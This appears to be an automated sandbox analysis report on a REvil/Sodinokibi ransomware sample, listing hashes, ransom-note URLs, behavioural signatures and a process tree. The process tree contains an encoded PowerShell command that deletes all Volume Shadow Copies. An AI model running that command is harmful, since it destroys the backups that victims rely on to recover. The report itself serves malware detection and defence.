Analysis
-
max time kernel
120s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
10-08-2023 00:38
Static task
static1
Behavioral task
behavioral1
Sample
adb.vbs.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
adb.vbs.exe
Resource
win10-20230703-en
Behavioral task
behavioral3
Sample
adb.vbs.exe
Resource
win10v2004-20230703-en
General
-
Target
adb.vbs.exe
-
Size
116KB
-
MD5
b86ad4241b01376b3924a380f6f4c934
-
SHA1
10682d08a18715a79ee23b58fdb6ee44c4e28c61
-
SHA256
14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708
-
SHA512
54fd19cfc37255e7ddf3456d1a2989558522cf58e5eee6ca916c19542921fe3ba4e7a431a35e0e1edbfc37c5651d392e7c3c54eb408754c0488021b16fdf92c9
-
SSDEEP
1536:aTZINbRh0SKws6KTUkmHlntMvfWhbpfCqeICS4AKvQIFlswOmZFS0cnwpIGmQwB:FRix3PWhNlOVFmw5q0cifmQ
Malware Config
Extracted
C:\Users\835a63va4p-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0F2C8840A1F62CF1
http://decryptor.cc/0F2C8840A1F62CF1
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
adb.vbs.exedescription ioc process File opened (read-only) \??\B: adb.vbs.exe File opened (read-only) \??\M: adb.vbs.exe File opened (read-only) \??\N: adb.vbs.exe File opened (read-only) \??\U: adb.vbs.exe File opened (read-only) \??\Y: adb.vbs.exe File opened (read-only) \??\V: adb.vbs.exe File opened (read-only) \??\F: adb.vbs.exe File opened (read-only) \??\G: adb.vbs.exe File opened (read-only) \??\J: adb.vbs.exe File opened (read-only) \??\K: adb.vbs.exe File opened (read-only) \??\L: adb.vbs.exe File opened (read-only) \??\Q: adb.vbs.exe File opened (read-only) \??\H: adb.vbs.exe File opened (read-only) \??\I: adb.vbs.exe File opened (read-only) \??\O: adb.vbs.exe File opened (read-only) \??\R: adb.vbs.exe File opened (read-only) \??\Z: adb.vbs.exe File opened (read-only) \??\W: adb.vbs.exe File opened (read-only) \??\X: adb.vbs.exe File opened (read-only) \??\D: adb.vbs.exe File opened (read-only) \??\A: adb.vbs.exe File opened (read-only) \??\E: adb.vbs.exe File opened (read-only) \??\P: adb.vbs.exe File opened (read-only) \??\S: adb.vbs.exe File opened (read-only) \??\T: adb.vbs.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
adb.vbs.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\93p5.bmp" adb.vbs.exe -
Drops file in Program Files directory 17 IoCs
Processes:
adb.vbs.exedescription ioc process File created \??\c:\program files (x86)\835a63va4p-readme.txt adb.vbs.exe File opened for modification \??\c:\program files\SelectMove.temp adb.vbs.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\835a63va4p-readme.txt adb.vbs.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\835a63va4p-readme.txt adb.vbs.exe File created \??\c:\program files\835a63va4p-readme.txt adb.vbs.exe File opened for modification \??\c:\program files\CompareDebug.bmp adb.vbs.exe File opened for modification \??\c:\program files\InvokeConvertFrom.tif adb.vbs.exe File opened for modification \??\c:\program files\JoinCopy.mp4 adb.vbs.exe File opened for modification \??\c:\program files\ResolveFormat.eps adb.vbs.exe File opened for modification \??\c:\program files\UndoUnprotect.3g2 adb.vbs.exe File opened for modification \??\c:\program files\BackupNew.shtml adb.vbs.exe File opened for modification \??\c:\program files\WatchSearch.M2TS adb.vbs.exe File opened for modification \??\c:\program files\CopyFind.ttf adb.vbs.exe File opened for modification \??\c:\program files\NewWait.au3 adb.vbs.exe File opened for modification \??\c:\program files\RedoWait.ram adb.vbs.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\835a63va4p-readme.txt adb.vbs.exe File opened for modification \??\c:\program files\AssertLock.m4a adb.vbs.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
adb.vbs.exepowershell.exepid process 2392 adb.vbs.exe 2484 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
adb.vbs.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 2392 adb.vbs.exe Token: SeDebugPrivilege 2484 powershell.exe Token: SeBackupPrivilege 2912 vssvc.exe Token: SeRestorePrivilege 2912 vssvc.exe Token: SeAuditPrivilege 2912 vssvc.exe Token: SeTakeOwnershipPrivilege 2392 adb.vbs.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
adb.vbs.exedescription pid process target process PID 2392 wrote to memory of 2484 2392 adb.vbs.exe powershell.exe PID 2392 wrote to memory of 2484 2392 adb.vbs.exe powershell.exe PID 2392 wrote to memory of 2484 2392 adb.vbs.exe powershell.exe PID 2392 wrote to memory of 2484 2392 adb.vbs.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\adb.vbs.exe"C:\Users\Admin\AppData\Local\Temp\adb.vbs.exe"1⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2484
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2308
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2912
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\835a63va4p-readme.txtFilesize
7KB
MD5da9bfec83e05180e15101131a214a2e7
SHA1b6f8b588dc87f84deb0c57b85143deeed5fc9455
SHA256465f63decac4f1af49739c64f52356613ee12cc6493c09ffac6b0e7f482b59a3
SHA512bfa0ffd72b0522d44ce9aedda18992925d72d52f80fdc117be2d2b3ce80c7eeee0b1ca73e79ea25500ace2dd20acb205dbe3a7e5a2b5c839da15ae3684d41ee6
-
memory/2484-58-0x000000001B0E0000-0x000000001B3C2000-memory.dmpFilesize
2.9MB
-
memory/2484-59-0x0000000002690000-0x0000000002698000-memory.dmpFilesize
32KB
-
memory/2484-60-0x000007FEF5060000-0x000007FEF59FD000-memory.dmpFilesize
9.6MB
-
memory/2484-61-0x0000000002750000-0x00000000027D0000-memory.dmpFilesize
512KB
-
memory/2484-62-0x0000000002750000-0x00000000027D0000-memory.dmpFilesize
512KB
-
memory/2484-63-0x0000000002750000-0x00000000027D0000-memory.dmpFilesize
512KB
-
memory/2484-64-0x000007FEF5060000-0x000007FEF59FD000-memory.dmpFilesize
9.6MB
-
memory/2484-65-0x0000000002750000-0x00000000027D0000-memory.dmpFilesize
512KB
-
memory/2484-66-0x000007FEF5060000-0x000007FEF59FD000-memory.dmpFilesize
9.6MB